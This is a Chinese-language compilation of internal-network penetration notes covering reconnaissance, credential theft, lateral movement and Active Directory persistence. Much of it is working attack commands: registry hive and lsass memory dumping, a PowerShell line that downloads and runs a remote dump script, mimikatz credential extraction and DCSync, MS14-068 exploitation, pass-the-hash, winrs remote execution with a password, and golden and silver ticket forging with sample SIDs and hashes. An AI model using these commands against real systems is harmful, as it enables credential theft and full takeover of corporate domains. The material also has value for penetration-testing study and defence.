内网渗透归纳(持续更新)

内网渗透,最重要得是定位问题。所以前期的调研和收集是非常重要的一项工作。
标:本文多数内容是整合的知识点。


0x00 前期基本信息探测

尽可能详细得分析出网段信息、各部门ip段、重点找出IT运维部、OA、邮箱服务器、人力资源管理等。
最后画一张组织结构图,这样在内网定位的时候,无论是针对内网查找资料还是针对特殊任务都是非常实用的一项技术。
不过信息收集,不是一天两天就能完成的事情,这种事情要持之以恒。

一、人事组织结构图

demo:
安创科技

思路:这种人事图,除了在外部站点上有,也可以到首页去查找关于我们,有一些简单的说明,然后再去招聘网找各式的岗位名称,最后连蒙带猜(没有这样的操作),收集尽量精确能到各个人员。当然,想要详细,就得通过不同的渠道获取。

二、ip分布

思路:

  1. 一般大公司有内部门户系统,可通过内部门户系统公开链接找出部门ip段(如果找到路由也很惊喜);
  2. 内网中可通过路由器、交换机等设备命令执行、snmp、弱口令获取网络拓扑;
  3. DNS域传送信息泄漏;

0x01 切入点(起点)

切入点.png

  1. Web门户系统getshell –> system权限;
  2. 邮件服务器;
  3. 邮件服务器获取信息中得出VPN账密和IP地址;
  4. 路由器建立VPN进入;
  5. 社工上线;
  6. 待更新…

0x02 靶机信息收集

主要针对三种:

  1. 基于命令形式的,包括权限信息,机器信息,进程端口,网络连接,共享、会话等等;
  2. 基于应用与文件形式的,例如一些敏感文件,密码文件,浏览器,远程连接客户端等;
  3. 还有一种是最直接的,例如抓取本地明文与hash,键盘记录,屏幕记录等。

网上已经有大量相关的资源与文章了,这里就不再占篇幅了,只说点额外的不常见技巧。

一、命令行形式

包括但不限于一下几点

(一)常用命令

1
2
3
4
5
6
7
8
9
10
11
12
hostname #主机名
systeminfo #系统信息(所在域,开机时间,安装信息,补丁情况,系统版本)
set #环境变量
net user #查看默认用户
net view #显示当前域或工作组中计算机的列表
net localgroup #查看用户组
net localgroup Administrators #查看Administrators组所有用户(包括隐藏用户)
query user #查看当前会话(window7 64以上)
tasklist /v #显示当前进程和进程用户
net config workstation #查看当前登陆用户信息
net statistics workstation #查看主机开机时间
net share #查看共享文件夹

(二)不常用命令

1
2
3
4
5
6
7
8
9
10
whoami /all   查看Mandatory Label看我们是否过uac
net session 查看有没有远程连过来的session
cmdkey /l 看是否保存了登陆凭证.(凭据管理器)
echo %logonserver% 查看登陆域
net stitastics server 查看登陆时间
Wmic 能让攻击者大量利用来获取系统信息的系统自带工具
wmic qfe list #获取补丁信息
Netsh 做端口转发
spn –l administrator 域内查某个用户spn记录
dsquery | nltest 域内信息收集

二、应用与文件形式

虽然标题不错,但是内容只是去翻文件,包括一些应用的配置文件,密码文件等。
有时候会碰到一些加密的office办公软件,例如word,excel 这些。

如果是低版本如2003的话,攻击者会在百度搜一些网上的破解软件进行破解(会联网)。
如果是高版本的话,往往在目标用户开着文件时使用微软SysinternalsSuite套装中的procdump将内存dump回去,用内存查看器直接查看文件内容。

因此就算有些敏感文件加密了照样能够被攻击者获取敏感信息。

三、hash和明文

这一步使用mimikatz基本就足够了,也分exe、dll与ps三个版本,分情况使用,但免杀是个问题。

(一)从 sam 中提取目标系统本地用户密码 hash

使用regsamsystemsecurity文件导出来,并拖回本地。

1
2
3
4
5
6
7
8
9
10
# >cd Desktop

# Desktop>reg save HKLM\SYSTEM system.hiv
The operation completed successfully.

# Desktop>reg save HKLM\SAM sam.hiv
The operation completed successfully.

# Desktop>reg save HKLM\SECURITY sercrity.hiv
The operation completed successfully.

PS:本地复原机器与目标机器务必一致。复原结果:

mimikatz_sam.png

这个方法在某些情况下有奇效。

(二)通过 dump lsass.exe 进程数据离线免杀抓明文的各种方式

1、procdump.exe

1
2
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

本地还原

1
2
3
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

2、PowerShell

1
2
3
# Public>powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1');"Get-Process lsass | Out-Minidump"
或者本机执行
# Public>powershell –exec bypass –Command "& {Import-Module 'C:\Users\Public\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump}"

mimikatz_sam.png

PS:Out-Minidump.ps1有C# 版本SharpDump

3、SqlDumper

如果目标系统上安装了Windows SQL ServerSqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\Shared,其中number代表sql server的版本。

1
2
3
4
5
6
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005

当然,如果没有安装有Windows SQL Server的话,可以自己上传一个SqlDumper.exe

上去。

使用方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
c:\Users\Public>tasklist /svc |findstr lsass.exe"
lsass.exe 512 SamSs

c:\Users\Public>SqlDumper-2016.exe 512 0 0x01100
Parsed parameters:
ProcessID = 512
ThreadId = 0
Flags = 0x120
MiniDumpFlags = 0x1966
SqlInfoPtr = 0x0000000000000000
DumpDir = <NULL>
ExceptionRecordPtr = 0x0000000000000000
ContextPtr = 0x0000000000000000
ExtraFile = <NULL>
PatternForExtraFiles = <NULL>
InstanceName = <NULL>
ServiceName = <NULL>
Remote process didn't specify a dump file name
Target suspended
Callback type 11 not used
Callback type 15 not used
Callback type 7 not used
MiniDump completed: SQLDmpr0001.mdmp
Total Buffer pool data pages filtered out: 0 KB
Total Hekaton data pages filtered out: 0 KB
Total Free memory (from non top level allocators) filtered out: 0 KB
Total top level free memory filtered out: 0 KB
Total Log pool memory filtered out: 0 KB
Location of module 'dbghelp.dll' : 'C:\Windows\system32\dbghelp.dll'
File version of module 'C:\Windows\system32\dbghelp.dll' : '6.1:7601.17514'
Product version of module 'C:\Windows\system32\dbghelp.dll' : '6.1:7601.17514'
GetModuleHandle () Failed 0x7e - The specified module could not be found.

Watson Invoke: No

(三)关于 windows 10 / 2012r2 以后系统的明文密码抓取方式

windows 10 / 2012之后的系统版本中,默认情况下是禁用了在内存缓存中存储系统用户明文密码。此时使用mimikatz去抓取密码,会显示null。

解决办法为:修改注册表–> 抓取windows server 2012 & 2016 & win8明文密码

0x03 网络环境的判断

  1. 机器所处位置区域的判断;
  2. 机器角色的判断;
  3. 进出口流量是否连通的判断,是否出的去,进的来。

一、位置的判断

位置判断是指机器处于网络拓扑中的某个区域,是在DMZ区,办公网,还是核心区,核心DB等多个位置,当然这里的区域并不是绝对的,只是大概的一个环境,不同的地方网络环境不一样,区域的界限也不一定明显。

二、角色的判断

机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。

三、连通性的判断

出口流量是否连通的判断指机器是否能上外网这些,要综合判断协议(tcp\http\dns\icmp等协议)与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况,攻击者通常会查看环境变量set,主机名是否有proxy字样的机器,注册表是否有写明代理地址或指定pac代理文件等。


0x04 横向渗透

如果是workgroup横向,攻击者会尝试web漏洞挖掘、密码猜解、嗅探等,方法不是特别的多。
如果是domain横向,方法就比较多了,在workgroup横向多了例如AD2008 gpp 、ms14-068 、kerberoast 和配置错误等。

一、默认权限配置认知

1
2
3
4
5
6
7
[+]普通机器
允许Console:administrator组(domain admins),users组(domain users),backup operators组
允许rdp:administrator组(domain admins),Remote desktop users组

[+]域控AD
允许Console:administrator组,backup operators组,account operators组,print operators组,server operators组
允许rdp:administrator组,Remote desktop users组

如果出现配置错误,那就是权限配置问题。

tips:当某些普通\不普通用户加入AD的rdp组或其他管理员组,当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。

二、代理转发

渗透测试-之-代理篇

三、工作组横向

工作组横向的方法、花样要比域环境少得多。

工作组一般都是个人机和少数服务器。通常使用的方法有:

  • 扫描网段中的web服务,个人机可能会存在一些默认的基础环境,供个人测试使用。比如:phpStudyAppServXAMPP,这些基本都是默认配置;
  • MS17-010,补丁号为KB4013389
  • hash抓取 –> hash注入、IPC登陆 –> hash碰撞;
  • 在无凭证的条件下使用Responder
  • ARP嗅探/欺骗攻击(Cain和Ettercap)–> 不推荐使用;
  • 会话劫持;
  • 最佳助攻 –> 社会工程学;
  • 待更新….

四、域环境横向

(一)域内信息探测

  • Windows环境
    常用命令
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    net user /domain  #查看域用户
    net view /domain #查看有几个域
    net view /domain:XXX #查看此域内电脑
    net group /domain #查询域里面的组
    net group "domain computers" /domain #查看加入到域内的所有计算机名
    net group "domain admins" /domain #查看域管理员
    nltest /dclist:xxx #查看域控制器
    net group "domain controllers" /domain #查看域控制器
    net user hacker /domain #获得指定账户的详细信息
    net accounts /domain #获得域密码策略设置,密码长短,错误锁定等信息

dsquery 命令 查询 AD

1
2
3
4
5
6
7
8
9
10
11
dsquery computer - 查找目录中的计算机。
dsquery contact - 查找目录中的联系人。
dsquery subnet - 查找目录中的子网。
dsquery group - 查找目录中的组。
dsquery ou - 查找目录中的组织单位。
dsquery site - 查找目录中的站点。
dsquery server - 查找目录中的 AD DC/LDS 实例。
dsquery user - 查找目录中的用户。
dsquery quota - 查找目录中的配额规定。
dsquery partition - 查找目录中的分区。
dsquery * - 用通用的 LDAP 查询来查找目录中的任何对象。

Net系列命令获取域内信息

1
2
3
4
5
6
7
8
9
Csvde/ldifde/dsquery/adfind/ldapsearch #探测更详细信息
使用`Get-SPN`(powershell脚本LDAP中快速查询符合指定得用户、组、或者SPN服务名称)
Nslookup -type=SRV_ldap._tcp #(寻找域控)
tasklist /v #列出进程和进程所有者(看是否有域管登陆)
PowerView #(powershell脚本 辅助找寻定位关键用户,查看域管在线机器)
WinScanX.exe #远程信息刺探
Winfo.exe #遍历远程用户名
nmap smb-enum-sessions.nse #(引擎来获取远程机器的登陆session,并且不需要管理权。)
netview.exe`#(它利用`NetSessionEnum`来寻找登陆sessions,利用`NetShareEnum`来找寻共享,利用`NetWkstaUserEnum`来枚举登陆的用户)


  • linux
  1. cat /etc/nsswitch
    看看密码登陆策略,我可以看到使用了file ldap模式
  2. less /etc/ldap.conf
    base ou=People,dc=unix-center,dc=net
    找到ou,dc,dc设置
  3. 查找10条用户记录
    ldapsearch -h 192.168.2.2 -x -z 10 -p指定端口
  4. 查看NFS连接
    showmount -e ip
  5. 查找管理员信息
    匿名方式
    1
    ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


(二)域管权限获取

除了工作组的那几种方法外,还有专属域环境的渗透方式.

1、组策略漏洞(GPP)

域管理员使用GPP来配置和操作域,常见的操作有远程创建本地用户、映射打印机、映射磁盘等,这些操作有时候需要提供账号密码。当组策略进行分发时,会在SYSVOL目录下生成一个xml文件,理所当然的前面提供的账号密码都保存在这个xml文件中,而密码是经过AES加密得,也就是说完全可逆的加密算法,而微软同时也很照顾的公布了加密密钥,所以任何域普通用户就可以读取这些xml文件并使用公开的AES密钥破解密码。组策略漏洞是windows 2008的,而且不一定是groups.xml,其他的xml也可能存在密码。

1
dir \\domain.com\sysvol\*

2、KERBEROS协议漏洞

常见的三种共计方法:MS14-068Golden ticket(黄金票据)SILVER TICKET(白银票据)

简单介绍下Kerberos协议的工作方法:

  • 客户机将明文密码进行ntlm哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket)
  • 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中tgt数据
  • 然后客户机将tgt发送给域控制器KDC请求TGS(票证授权服务)票证,并且对tgt进行检测
  • 检测成功之后,将目标服务账户的ntlm以及tgt进行加密,将加密后的结果返回给客户机。
(1)ms14-068

Benjamin Delpy(Mimikatz的作者)写了一个MS14-068的利用工具,叫Kekeo,是PyKEX的升级版。它能够找到并定位有漏洞的域控,在打了补丁(KB3011780)和有2012/2012R2域控得情况下仍能凑效。

在利用MS14-068之前,建议先使用klist /purge清除服务器端缓存的Kerberos凭据,且使用域控地址不使用IP。

  • PyKEK

    • 准备条件
    1
    2
    3
    4
    域用户及其口令 (攻击主机可使用其他域用户信息,比如可以在主机A上用域用户B的口令及sid攻击)
    域用户对应sid (whoami /all)
    域控地址
    操作系统要求Win7及以上,这是因为XP不支持导入Ticket
    • 利用方法:
    1
    2
    3
    4
    ms14-068.exe -u -p -s -d  # 生成vuln.ccache
    klist /purge # 清除内存中的Ticket
    kerberos::ptc vuln.ccache # 导入vuln.ccache
    klist # 查看是否导入
  • Kekeo

    • Kekeo快捷用法仅需要以下参数(使用方法):
    1
    2
    3
    域用户及其口令
    域控地址
    ms14068.exe /domain:vuln.local /user:utilisateur /password:waza1234/ /ptt

#####(2)另外两种作为权限固守使用

3、相同密码登陆(hash碰撞)

hash碰撞实际上就是利用hash传递来盲打。

如果内网主机的本地管理员账户密码相同且允许本地账户登陆域内其他机器。

在域环境中,利用pass the hash的渗透方式往往是这样的:

1
2
3
4
5
1.获得一台域主机权限;
2.Dump内存获取用户hash(或明文);
3.通过pass the hash 或 pass the ticket尝试登陆其他主机;
4.继续收集hash或明文,并尝试远程登陆;
5.知道获得域管理员hash,登陆域控,最终成功控制整个域。

域登陆缓存mscash
使用reg命令提取sam、system、securit,然后用creddump7或者mimakatz提取mscash。

4、利用漏洞配置不当获取更多主机权限

  1. 常见应用漏洞:
    struts2、zabbix、axis、ImageMagic、fastcgi、Shellshock、redis未授权访问、Hadoop、weblogic、jboss、WebSphere、Coldfusion
  2. 常见语言反序列化漏洞
    php、Java、python、ruby、node.js
  3. 数据库漏洞及配置不当
    mssql Get-SQLServerAccess、MySQL低版本hash登陆、MySQL低版本Authentication Bypass、域内mssql凭证获取密码、monggodb未授权访问、memcache配置不当
  4. 内网中很多web应用存在常见漏洞、使用有漏洞的中间件和框架、弱口令及配置不当(注入、任意文件读取、备份、源码泄漏(rsync、git、svn、DS_Store)、代码执行、xss、弱口令、上传漏洞、权限绕过…)
  5. web应用、及数据库中寻找其他服务器密码信息(ftp、mail、smb、ldap存储、sql...
  6. 系统备份文件(ghost)中读密码
  7. 在已有控制权限主机中,查看各浏览器书签cookie存储密码键盘记录收集相关敏感信息、查询注册表中保存密码、读取各客户端连接密码、putty dll注入、putty密码截取、ssh连接密码,以获取更多主机权限
    推荐工具:NetRipperPuttyrider.exeProwserPasswordDump.exeLaZagne.exe
  8. ms08-067远程溢出(极少能碰到)
  9. cmdkey /list 远程终端可信任连接连接netpass.exe读取该密码
  10. arp欺骗中间人攻击(替换sql数据包、认证凭证获取、密码获取极大不到万不得已不会用)
  11. WPAD中间人攻击(全称网络代理自动发现协议、截获凭证该种方法不需要ARP欺骗,比较好用的一种方法(使用Responder.py/net-creds.py))
  12. 翻阅相关文件及以控制数据库中可能存储配置口令(别忘了回收站)
  13. 用已有控制权限的邮箱账号以及前期所了解到的信息进行欺骗(社会工程学)
  14. 定向浏览器信息ip信息定向挂马(0day)
  15. 用以收集的密码(组合变换密码)对各服务进行爆破
  16. 应用0day攻击…

5、远程命令执行方式

例如at\schtasks\psexec\wmic\sc\ps网上有很多相关资源也不占篇幅了,只提一个很少提的。从2012r2 起,他们开了一个端口叫5985,原理跟大家常说的powershell remote是一样的,基于winrm服务,于是可以这样执行。又是一个系统自带的远程管理工具。

1
winrs -r:192.168.22.33 -u:administrator -p:p@assw0rd ipconfig

(三)目标定位

在有域控权限的条件下,需要找到某台机器(服务器、个人机、数据库)

我们首先先将所有的域用户的详细信息都列举出来,通过详细名称(Full Name)确认其域用户。
【域渗透】批量Net-User

1
2
dsquery user - 查找目录中的用户。
dsquery computer - 查找目录中的计算机。

我们将上面的两条命令的执行结果结合起来进行归类。
然后通过域控日志查找登陆IP或者机器。当然,除了日志还有别的方式,不限于日志。
【域渗透】获取域环境内用户登录信息
找到机器或者IP之后,可通过域管理员或者用其域用户进行登陆。登陆的方式也是有多重,上面有讲过。

但是,也有些机器是登陆不上的。我们可以通过设置域登陆脚本进行操作。
【域渗透】在域控上使用cmd更改域用户配置文件中的登录脚本

后续待更新、、、


五、权限维持

(一)Pass The Ticket

获取权限后可使用wmic.vbs进行操作。

1
cscript wmiexec.vbs /shell dc-01.vuln.local

1、Export the ticket

在我们成功获得域控权限后,就可以导出域控内存中的Ticket,在默认的10个小时以内都可以利用来登录域控。

1
2
mimikatz # sekurlsa::tickets /export  # 导出Ticket
mimikatz "kerberos::ptt C:\test\[0;2d87a]-2-0-40e00000-a@krbtgt-Vuln.LOCAL.kirbi" # 在普通域用户机器上执行

Tips:

1
2
64位系统使用ptt功能要用32位的mimikatz,如果用64的mimikatz,那么无法导入Ticket
这种方式导入的Ticket默认在10小时以内生效

2、Golden Ticket(黄金票据)

Golden Ticket是伪造的TGT(Ticket Granting Ticket)–>票据授权票据,所以可以获取任何Kerberos服务权限。

每个用户的Ticket都是由krbtgt用户的密码Hash来生成的,如果我们拿到了Krbtgt的密码Hash,就可以随意伪造Ticket

(1)导出krbtgt的Hash

在域控上执行

1
2
#!bash
mimikatz log "lsadump::dcsync /domain:vuln.local /user:krbtgt"

生成mimikatz.log记录输出,使用log输出是为了方便复制Hash值

提取所需信息:

1
2
3
/domain:test.local
/sid:S-1-5-21-4155807533-xxxxxx-2767329826
/aes256:af71a24ea463446f9b4c645e1bfexxxxxx70c7d785df10acf008xxxxxx5e682f
(2)生成Golden Ticket

伪造的用户设置为test,执行以下命令生成文件gold.kirbi

1
2
3
mimikatz "kerberos::golden /domain:vuln.local /sid:S-1-5-21-4155807533-xxxxxx-2767329826 
/aes256:af71a24ea463446f9b4c645e1bfexxxxxx70c7d785df10acf008xxxxxx5e682f /user:test
/ticket:test.kirbi"

Tips:生成Golden Ticket不仅可以使用aes256,也可用krbtgtNTLM hash

(3)导入Golden Ticket
1
kerberos::ptt test.kirbi

Tips:

1
2
3
这种方式导入的Ticket默认在20分钟以内生效,当然,如果过期了,再次ptt导入Golden Ticket就好
可以伪造任意用户,即使其不存在
krbtgt的NTLM hash不会轻易改变,即使修改域控管理员密码

3、Silver Ticket(白银票据)

Silver Ticket是伪造的TGS(Ticket Granting Server)–>票据授权服务器,所以也叫service ticket,只能访问指定的服务权限。

  • 比如现在要访问域控上的cifs服务(cifs服务用于Windows主机间的文件共享)
(1)所需条件
1
2
3
4
5
6
/domain
/sid
/target:目标服务器的域名全称,此处为域控的全称
/service:目标服务器上面的kerberos服务,此处为cifs
/rc4:计算机账户的NTLM hash,域控主机的本地计算机账户
/user:要伪造的用户名,此处可用silver测试
(2)使用方法
1
mimikatz "kerberos::golden /domain:vuln.local /sid:S-1-5-21-4155807533-921486164-2767329826 /target:dc-01.vuln.local /service:cifs /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"

成功导入,就可以访问域控上的文件共享。

  • 如果要访问域控上的LDAP服务

    只需要把/service的名称改为LDAP,/user改为krbtgt,/rc4改为krbtgt的NTLM HASH

    1
    mimikatz "kerberos::golden /domain:vuln.local /sid:S-1-5-21-4155807533-xxxxxx-2767329826  /target:dc-01.vuln.local /service:LDAP /rc4:d5304f9ea69523479xxxxxxebb5a2155 /user:krbtgt /ptt"

    导入成功,但是无法访问域控的文件共享服务,因为范围有限,只能访问指定的服务权限。

    但是,执行以下命令可以远程访问LDAP服务来获得krbtgt的信息:

    1
    mimikatz "lsadump::dcsync /dc:dc-01.vuln.local /domain:vuln.local /user:krbtgt"

    所以可以获取任何Kerberos服务权限。

    注:

    1
    2
    3
    4
    lsadump::dcsync
    向 DC 发起一个同步对象(可获取帐户的密码信息)的质询。
    需要的权限包括管理员组(Administrators),域管理员组( Domain Admins)或企业管理员组(Enterprise Admins)以及域控制器的计算机帐户
    只读域控制器默认不允许读取用户密码数据

    参数选项:

    1
    2
    3
    /user - 要查询的用户id 或 SID
    /domain(可选的)默认设置为当前域。
    /dc(可选的)指定DCSync 连接的域控位置

    当然还有其他可作Silver Ticket的服务

(二)三好学生师傅的文章

域渗透——Security Support Provider

域渗透——Skeleton Key

域渗透——Hook PasswordChangeNotify

….

(三)域内配置ACL后门及检测清理

(四)windows后门种植方式收集


0x05 整合参考

更多资料请参考以下文章

黑客游走于企业windows内网的几种姿势

内网渗透——网络环境的判断

深入解读MS14-068漏洞:微软精心策划的后门?

域渗透之横向移动

域渗透——Pass The Hash & Pass The Key

windows后门种植方式收集

域渗透——Pass The Ticket

How Attackers Use Kerberos Silver Tickets to Exploit Systems

域内配置ACL后门及检测清理

!坚持技术分享,您的支持将鼓励我继续创作!